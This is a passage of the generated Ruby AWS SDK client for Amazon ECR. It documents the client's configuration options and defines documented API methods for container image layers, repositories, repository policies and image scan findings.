add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::JsonRpc)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::SharedCredentials` - Used for loading static credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# * `Aws::AssumeRoleWebIdentityCredentials` - Used when you need to
# assume a role after providing credentials via the web.
#
# * `Aws::SSOCredentials` - Used for loading credentials from AWS SSO using an
# access token generated from `aws login`.
#
# * `Aws::ProcessCredentials` - Used for loading credentials from a
# process that outputs to stdout.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::ECSCredentials` - Used for loading credentials from
# instances running in ECS.
#
# * `Aws::CognitoIdentityCredentials` - Used for loading credentials
# from the Cognito Identity service.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2/ECS IMDS instance profile - When used by default, the timeouts
# are very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentails` or `Aws::ECSCredentials` to
# enable retries and extended timeouts.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficent client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :simple_json (false)
# Disables request parameter conversion, validation, and formatting.
# Also disable response data type conversions. This option is useful
# when you want to ensure the highest level of performance by
# avoiding overhead of walking request parameters and response data
# structures.
#
# When `:simple_json` is enabled, the request parameters hash must
# be formatted exactly as the DynamoDB API expects.
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Integer] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Checks the availability of one or more image layers in a repository.
#
# When an image is pushed to a repository, each image layer is checked
# to verify if it has been uploaded before. If it has been uploaded,
# then the image layer is skipped.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# image layers to check. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository that is associated with the image layers to
# check.
#
# @option params [required, Array<String>] :layer_digests
# The digests of the image layers to check.
#
# @return [Types::BatchCheckLayerAvailabilityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::BatchCheckLayerAvailabilityResponse#layers #layers} => Array<Types::Layer>
# * {Types::BatchCheckLayerAvailabilityResponse#failures #failures} => Array<Types::LayerFailure>
#
# @example Request syntax with placeholder values
#
# resp = client.batch_check_layer_availability({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# layer_digests: ["BatchedOperationLayerDigest"], # required
# })
#
# @example Response structure
#
# resp.layers #=> Array
# resp.layers[0].layer_digest #=> String
# resp.layers[0].layer_availability #=> String, one of "AVAILABLE", "UNAVAILABLE"
# resp.layers[0].layer_size #=> Integer
# resp.layers[0].media_type #=> String
# resp.failures #=> Array
# resp.failures[0].layer_digest #=> String
# resp.failures[0].failure_code #=> String, one of "InvalidLayerDigest", "MissingLayerDigest"
# resp.failures[0].failure_reason #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/BatchCheckLayerAvailability AWS API Documentation
#
# @overload batch_check_layer_availability(params = {})
# @param [Hash] params ({})
def batch_check_layer_availability(params = {}, options = {})
req = build_request(:batch_check_layer_availability, params)
req.send_request(options)
end
# Deletes a list of specified images within a repository. Images are
# specified with either an `imageTag` or `imageDigest`.
#
# You can remove a tag from an image by specifying the image's tag in
# your request. When you remove the last tag from an image, the image is
# deleted from your repository.
#
# You can completely delete an image (and all of its tags) by specifying
# the image's digest in your request.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# image to delete. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The repository that contains the image to delete.
#
# @option params [required, Array<Types::ImageIdentifier>] :image_ids
# A list of image ID references that correspond to images to delete. The
# format of the `imageIds` reference is `imageTag=tag` or
# `imageDigest=digest`.
#
# @return [Types::BatchDeleteImageResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::BatchDeleteImageResponse#image_ids #image_ids} => Array<Types::ImageIdentifier>
# * {Types::BatchDeleteImageResponse#failures #failures} => Array<Types::ImageFailure>
#
#
# @example Example: To delete multiple images
#
# # This example deletes images with the tags precise and trusty in a repository called ubuntu in the default registry for
# # an account.
#
# resp = client.batch_delete_image({
# image_ids: [
# {
# image_tag: "precise",
# },
# ],
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# failures: [
# ],
# image_ids: [
# {
# image_digest: "sha256:examplee6d1e504117a17000003d3753086354a38375961f2e665416ef4b1b2f",
# image_tag: "precise",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.batch_delete_image({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_ids: [ # required
# {
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# ],
# })
#
# @example Response structure
#
# resp.image_ids #=> Array
# resp.image_ids[0].image_digest #=> String
# resp.image_ids[0].image_tag #=> String
# resp.failures #=> Array
# resp.failures[0].image_id.image_digest #=> String
# resp.failures[0].image_id.image_tag #=> String
# resp.failures[0].failure_code #=> String, one of "InvalidImageDigest", "InvalidImageTag", "ImageTagDoesNotMatchDigest", "ImageNotFound", "MissingDigestAndTag", "ImageReferencedByManifestList", "KmsError"
# resp.failures[0].failure_reason #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/BatchDeleteImage AWS API Documentation
#
# @overload batch_delete_image(params = {})
# @param [Hash] params ({})
def batch_delete_image(params = {}, options = {})
req = build_request(:batch_delete_image, params)
req.send_request(options)
end
# Gets detailed information for an image. Images are specified with
# either an `imageTag` or `imageDigest`.
#
# When an image is pulled, the BatchGetImage API is called once to
# retrieve the image manifest.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# images to describe. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The repository that contains the images to describe.
#
# @option params [required, Array<Types::ImageIdentifier>] :image_ids
# A list of image ID references that correspond to images to describe.
# The format of the `imageIds` reference is `imageTag=tag` or
# `imageDigest=digest`.
#
# @option params [Array<String>] :accepted_media_types
# The accepted media types for the request.
#
# Valid values: `application/vnd.docker.distribution.manifest.v1+json`
# \| `application/vnd.docker.distribution.manifest.v2+json` \|
# `application/vnd.oci.image.manifest.v1+json`
#
# @return [Types::BatchGetImageResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::BatchGetImageResponse#images #images} => Array<Types::Image>
# * {Types::BatchGetImageResponse#failures #failures} => Array<Types::ImageFailure>
#
#
# @example Example: To obtain multiple images in a single request
#
# # This example obtains information for an image with a specified image digest ID from the repository named ubuntu in the
# # current account.
#
# resp = client.batch_get_image({
# image_ids: [
# {
# image_tag: "precise",
# },
# ],
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# failures: [
# ],
# images: [
# {
# image_id: {
# image_digest: "sha256:example76bdff6d83a09ba2a818f0d00000063724a9ac3ba5019c56f74ebf42a",
# image_tag: "precise",
# },
# image_manifest: "{\n \"schemaVersion\": 1,\n \"name\": \"ubuntu\",\n \"tag\": \"precise\",\n...",
# registry_id: "244698725403",
# repository_name: "ubuntu",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.batch_get_image({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_ids: [ # required
# {
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# ],
# accepted_media_types: ["MediaType"],
# })
#
# @example Response structure
#
# resp.images #=> Array
# resp.images[0].registry_id #=> String
# resp.images[0].repository_name #=> String
# resp.images[0].image_id.image_digest #=> String
# resp.images[0].image_id.image_tag #=> String
# resp.images[0].image_manifest #=> String
# resp.images[0].image_manifest_media_type #=> String
# resp.failures #=> Array
# resp.failures[0].image_id.image_digest #=> String
# resp.failures[0].image_id.image_tag #=> String
# resp.failures[0].failure_code #=> String, one of "InvalidImageDigest", "InvalidImageTag", "ImageTagDoesNotMatchDigest", "ImageNotFound", "MissingDigestAndTag", "ImageReferencedByManifestList", "KmsError"
# resp.failures[0].failure_reason #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/BatchGetImage AWS API Documentation
#
# @overload batch_get_image(params = {})
# @param [Hash] params ({})
def batch_get_image(params = {}, options = {})
req = build_request(:batch_get_image, params)
req.send_request(options)
end
# Informs Amazon ECR that the image layer upload has completed for a
# specified registry, repository name, and upload ID. You can optionally
# provide a `sha256` digest of the image layer for data validation
# purposes.
#
# When an image is pushed, the CompleteLayerUpload API is called once
# per each new image layer to verify that the upload has completed.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry to which to upload
# layers. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to associate with the image layer.
#
# @option params [required, String] :upload_id
# The upload ID from a previous InitiateLayerUpload operation to
# associate with the image layer.
#
# @option params [required, Array<String>] :layer_digests
# The `sha256` digest of the image layer.
#
# @return [Types::CompleteLayerUploadResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CompleteLayerUploadResponse#registry_id #registry_id} => String
# * {Types::CompleteLayerUploadResponse#repository_name #repository_name} => String
# * {Types::CompleteLayerUploadResponse#upload_id #upload_id} => String
# * {Types::CompleteLayerUploadResponse#layer_digest #layer_digest} => String
#
# @example Request syntax with placeholder values
#
# resp = client.complete_layer_upload({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# upload_id: "UploadId", # required
# layer_digests: ["LayerDigest"], # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.upload_id #=> String
# resp.layer_digest #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/CompleteLayerUpload AWS API Documentation
#
# @overload complete_layer_upload(params = {})
# @param [Hash] params ({})
def complete_layer_upload(params = {}, options = {})
req = build_request(:complete_layer_upload, params)
req.send_request(options)
end
# Creates a repository. For more information, see [Amazon ECR
# Repositories][1] in the *Amazon Elastic Container Registry User
# Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/Repositories.html
#
# @option params [required, String] :repository_name
# The name to use for the repository. The repository name may be
# specified on its own (such as `nginx-web-app`) or it can be prepended
# with a namespace to group the repository into a category (such as
# `project-a/nginx-web-app`).
#
# @option params [Array<Types::Tag>] :tags
# The metadata that you apply to the repository to help you categorize
# and organize them. Each tag consists of a key and an optional value,
# both of which you define. Tag keys can have a maximum character length
# of 128 characters, and tag values can have a maximum length of 256
# characters.
#
# @option params [String] :image_tag_mutability
# The tag mutability setting for the repository. If this parameter is
# omitted, the default setting of `MUTABLE` will be used which will
# allow image tags to be overwritten. If `IMMUTABLE` is specified, all
# image tags within the repository will be immutable which will prevent
# them from being overwritten.
#
# @option params [Types::ImageScanningConfiguration] :image_scanning_configuration
# The image scanning configuration for the repository. This determines
# whether images are scanned for known vulnerabilities after being
# pushed to the repository.
#
# @option params [Types::EncryptionConfiguration] :encryption_configuration
# The encryption configuration for the repository. This determines how
# the contents of your repository are encrypted at rest.
#
# @return [Types::CreateRepositoryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateRepositoryResponse#repository #repository} => Types::Repository
#
#
# @example Example: To create a new repository
#
# # This example creates a repository called nginx-web-app inside the project-a namespace in the default registry for an
# # account.
#
# resp = client.create_repository({
# repository_name: "project-a/nginx-web-app",
# })
#
# resp.to_h outputs the following:
# {
# repository: {
# registry_id: "012345678901",
# repository_arn: "arn:aws:ecr:us-west-2:012345678901:repository/project-a/nginx-web-app",
# repository_name: "project-a/nginx-web-app",
# },
# }
#
# @example Request syntax with placeholder values
#
# resp = client.create_repository({
# repository_name: "RepositoryName", # required
# tags: [
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# image_tag_mutability: "MUTABLE", # accepts MUTABLE, IMMUTABLE
# image_scanning_configuration: {
# scan_on_push: false,
# },
# encryption_configuration: {
# encryption_type: "AES256", # required, accepts AES256, KMS
# kms_key: "KmsKey",
# },
# })
#
# @example Response structure
#
# resp.repository.repository_arn #=> String
# resp.repository.registry_id #=> String
# resp.repository.repository_name #=> String
# resp.repository.repository_uri #=> String
# resp.repository.created_at #=> Time
# resp.repository.image_tag_mutability #=> String, one of "MUTABLE", "IMMUTABLE"
# resp.repository.image_scanning_configuration.scan_on_push #=> Boolean
# resp.repository.encryption_configuration.encryption_type #=> String, one of "AES256", "KMS"
# resp.repository.encryption_configuration.kms_key #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/CreateRepository AWS API Documentation
#
# @overload create_repository(params = {})
# @param [Hash] params ({})
def create_repository(params = {}, options = {})
req = build_request(:create_repository, params)
req.send_request(options)
end
# Deletes the lifecycle policy associated with the specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository.
#
# @return [Types::DeleteLifecyclePolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteLifecyclePolicyResponse#registry_id #registry_id} => String
# * {Types::DeleteLifecyclePolicyResponse#repository_name #repository_name} => String
# * {Types::DeleteLifecyclePolicyResponse#lifecycle_policy_text #lifecycle_policy_text} => String
# * {Types::DeleteLifecyclePolicyResponse#last_evaluated_at #last_evaluated_at} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.delete_lifecycle_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
# resp.last_evaluated_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DeleteLifecyclePolicy AWS API Documentation
#
# @overload delete_lifecycle_policy(params = {})
# @param [Hash] params ({})
def delete_lifecycle_policy(params = {}, options = {})
req = build_request(:delete_lifecycle_policy, params)
req.send_request(options)
end
# Deletes the registry permissions policy.
#
# @return [Types::DeleteRegistryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteRegistryPolicyResponse#registry_id #registry_id} => String
# * {Types::DeleteRegistryPolicyResponse#policy_text #policy_text} => String
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DeleteRegistryPolicy AWS API Documentation
#
# @overload delete_registry_policy(params = {})
# @param [Hash] params ({})
def delete_registry_policy(params = {}, options = {})
req = build_request(:delete_registry_policy, params)
req.send_request(options)
end
# Deletes a repository. If the repository contains images, you must
# either delete all images in the repository or use the `force` option
# to delete the repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository to delete. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to delete.
#
# @option params [Boolean] :force
# If a repository contains images, forces the deletion.
#
# @return [Types::DeleteRepositoryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteRepositoryResponse#repository #repository} => Types::Repository
#
#
# @example Example: To force delete a repository
#
# # This example force deletes a repository named ubuntu in the default registry for an account. The force parameter is
# # required if the repository contains images.
#
# resp = client.delete_repository({
# force: true,
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# repository: {
# registry_id: "012345678901",
# repository_arn: "arn:aws:ecr:us-west-2:012345678901:repository/ubuntu",
# repository_name: "ubuntu",
# },
# }
#
# @example Request syntax with placeholder values
#
# resp = client.delete_repository({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# force: false,
# })
#
# @example Response structure
#
# resp.repository.repository_arn #=> String
# resp.repository.registry_id #=> String
# resp.repository.repository_name #=> String
# resp.repository.repository_uri #=> String
# resp.repository.created_at #=> Time
# resp.repository.image_tag_mutability #=> String, one of "MUTABLE", "IMMUTABLE"
# resp.repository.image_scanning_configuration.scan_on_push #=> Boolean
# resp.repository.encryption_configuration.encryption_type #=> String, one of "AES256", "KMS"
# resp.repository.encryption_configuration.kms_key #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DeleteRepository AWS API Documentation
#
# @overload delete_repository(params = {})
# @param [Hash] params ({})
def delete_repository(params = {}, options = {})
req = build_request(:delete_repository, params)
req.send_request(options)
end
# Deletes the repository policy associated with the specified
# repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository policy to delete. If you do not specify a registry, the
# default registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository that is associated with the repository
# policy to delete.
#
# @return [Types::DeleteRepositoryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteRepositoryPolicyResponse#registry_id #registry_id} => String
# * {Types::DeleteRepositoryPolicyResponse#repository_name #repository_name} => String
# * {Types::DeleteRepositoryPolicyResponse#policy_text #policy_text} => String
#
#
# @example Example: To delete the policy associated with a repository
#
# # This example deletes the policy associated with the repository named ubuntu in the current account.
#
# resp = client.delete_repository_policy({
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# policy_text: "{ ... }",
# registry_id: "012345678901",
# repository_name: "ubuntu",
# }
#
# @example Request syntax with placeholder values
#
# resp = client.delete_repository_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DeleteRepositoryPolicy AWS API Documentation
#
# @overload delete_repository_policy(params = {})
# @param [Hash] params ({})
def delete_repository_policy(params = {}, options = {})
req = build_request(:delete_repository_policy, params)
req.send_request(options)
end
# Returns the scan findings for the specified image.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to describe the image scan findings for. If you do
# not specify a registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The repository for the image for which to describe the scan findings.
#
# @option params [required, Types::ImageIdentifier] :image_id
# An object with identifying information for an Amazon ECR image.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated
# `DescribeImageScanFindings` request where `maxResults` was used and
# the results exceeded the value of that parameter. Pagination continues
# from the end of the previous results that returned the `nextToken`
# value. This value is null when there are no more results to return.
#
# @option params [Integer] :max_results
# The maximum number of image scan results returned by
# `DescribeImageScanFindings` in paginated output. When this parameter
# is used, `DescribeImageScanFindings` only returns `maxResults` results
# in a single page along with a `nextToken` response element. The
# remaining results of the initial request can be seen by sending
# another `DescribeImageScanFindings` request with the returned
# `nextToken` value. This value can be between 1 and 1000. If this
# parameter is not used, then `DescribeImageScanFindings` returns up to
# 100 results and a `nextToken` value, if applicable.
#
# @return [Types::DescribeImageScanFindingsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeImageScanFindingsResponse#registry_id #registry_id} => String
# * {Types::DescribeImageScanFindingsResponse#repository_name #repository_name} => String
# * {Types::DescribeImageScanFindingsResponse#image_id #image_id} => Types::ImageIdentifier
# * {Types::DescribeImageScanFindingsResponse#image_scan_status #image_scan_status} => Types::ImageScanStatus
# * {Types::DescribeImageScanFindingsResponse#image_scan_findings #image_scan_findings} => Types::ImageScanFindings
# * {Types::DescribeImageScanFindingsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.describe_image_scan_findings({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_id: { # required
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# next_token: "NextToken",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.image_id.image_digest #=> String
# resp.image_id.image_tag #=> String
# resp.image_scan_status.status #=> String, one of "IN_PROGRESS", "COMPLETE", "FAILED"
# resp.image_scan_status.description #=> String
# resp.image_scan_findings.image_scan_completed_at #=> Time
# resp.image_scan_findings.vulnerability_source_updated_at #=> Time
# resp.image_scan_findings.findings #=> Array
# resp.image_scan_findings.findings[0].name #=> String
# resp.image_scan_findings.findings[0].description #=> String
# resp.image_scan_findings.findings[0].uri #=> String
# resp.image_scan_findings.findings[0].severity #=> String, one of "INFORMATIONAL", "LOW", "MEDIUM", "HIGH", "CRITICAL", "UNDEFINED"
# resp.image_scan_findings.findings[0].attributes #=> Array
# resp.image_scan_findings.findings[0].attributes[0].key #=> String
# resp.image_scan_findings.findings[0].attributes[0].value #=> <Hash,Array,String,Numeric,Boolean,IO,Set,nil>
# resp.image_scan_findings.finding_severity_counts #=> Hash
# resp.image_scan_findings.finding_severity_counts["FindingSeverity"] #=> Integer
# resp.next_token #=> String
#
#
# The following waiters are defined for this operation (see {Client#wait_until} for detailed usage):
#
# * image_scan_complete
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DescribeImageScanFindings AWS API Documentation
#
# @overload describe_image_scan_findings(params = {})
# @param [Hash] params ({})
def describe_image_scan_findings(params = {}, options = {})
req = build_request(:describe_image_scan_findings, params)
req.send_request(options)
end
# Returns metadata about the images in a repository.
#
# <note markdown="1"> Beginning with Docker version 1.9, the Docker client compresses image
# layers before pushing them to a V2 Docker registry. The output of the
# `docker images` command shows the uncompressed image size, so it may
# return a larger image size than the image sizes returned by
# DescribeImages.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to describe images. If you do not specify a
# registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The repository that contains the images to describe.
#
# @option params [Array<Types::ImageIdentifier>] :image_ids
# The list of image IDs for the requested repository.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated
# `DescribeImages` request where `maxResults` was used and the results
# exceeded the value of that parameter. Pagination continues from the
